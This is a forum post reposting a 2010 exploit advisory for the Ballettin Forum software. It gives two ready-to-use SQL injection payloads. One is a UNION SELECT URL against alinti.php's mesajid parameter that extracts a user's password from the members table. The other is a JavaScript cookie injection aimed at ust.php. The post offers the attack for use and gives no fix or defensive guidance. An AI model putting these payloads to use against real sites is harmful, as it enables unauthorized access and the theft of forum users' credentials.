Jump to content
begood

Ballettin Forum Multiple SQL Injection Vulnerability

Recommended Posts

Posted

====================================================================# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability

# Date: 25/07/2010

# Author: 3v0 aka evolution <evolution ^ darkedition.com>

# Software Link: http://www.ballettin.com

# Tested on: Windows Xp Pack 3

====================================================================

#1 - Vulnerable File

------------------------------------------------------

[+] File: http://www.site.com/alinti.php?mesajid=

[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1

#2 - Insecure Cookie

------------------------------------------------------

javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";

After go to http://www.site.com/ust.php

====================================================================

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...